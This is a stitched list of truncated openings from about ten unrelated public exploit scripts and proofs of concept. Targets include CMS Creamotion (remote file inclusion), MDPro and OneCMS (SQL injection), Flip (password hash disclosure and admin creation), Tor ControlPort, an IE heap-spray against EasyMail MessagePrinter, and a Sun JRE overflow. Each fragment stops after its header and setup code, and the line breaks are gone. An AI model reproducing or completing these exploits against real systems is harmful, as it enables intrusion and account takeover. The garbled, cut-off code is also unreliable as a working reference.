#!/usr/bin/php -q -d short_open_tag=on ? /* /* CMS Creamotion - Remote File include /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* CMS Creamot
ELSEIF CMS Tested on Else If version Beta 0.6 Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net These Are Examples .. iam tiered fetching the injected files :) Remote File inclusio
#!/usr/bin/perl use strict; use IO::Socket; my $app = MDPro 1.0.76; my $type = SQL Injection; my $author = undefined1_; my $settings = magic_quotes_runtime = off, mysql = 4.1.0; $| = 1; print :: $app $type - by $author ::nnn; my $url = shift || us
!-- Tor 0.1.2.16 with ControlPort enabled ( not default ) Exploit for Tor ControlPort torrc Rewrite Vulnerability http://secunia.com/advisories/26301 Rewrites the torrc to log to a different location: C:Documents and SettingsAll UsersStart MenuPr
html SCRIPT language=javascript // This is new technique I invent call 'heap fill attack' var str0ke = 0x0d0d0d0d; var sucks = unescape( // Launch the system calculator 100 times because what else? // This code currently not work on Solaris/Sparc %u9
!-- rgod_em_msgprn_heap.html EasyMail MessagePrinter Object (emprint.DLL 6.0.1.0) remote heap overflow exploit (ie6 / xp sp2) Mr Dormann, this should integrate this :D : http://www.kb.cert.org/vuls/id/281977 retrieved from postcast srvr, dunno other
#!/usr/bin/perl use strict; use IO::Socket; my $app = Flip = 3.0; my $type = Passwords Hash Disclosure; my $author = undefined1_; my $vendor = http://sourceforge.net/projects/flipsource; banner(); my $server = shift || usage(); my $port = shift || us
#!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = Flip = 3.0; my $type = Admin Creation; my $author = undefined1_; my $vendor = http://sourceforge.net/projects/flipsource; my %opt; getopts(t:, %opt); $| = 1; print :: $app $type
#!/usr/bin/perl # # OneCMS v2.4 Remote SQL Injection Exploit # # Description # ----------- # OneCMS contains a flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the userreviews.php script not # properly sanitizi
html body center Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoCbr Bug founded and code released by Yag Kohha. br Greetz to: br Shinnai, Str0ke br /center object classid=CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284 id=target/OBJECT SCRIPT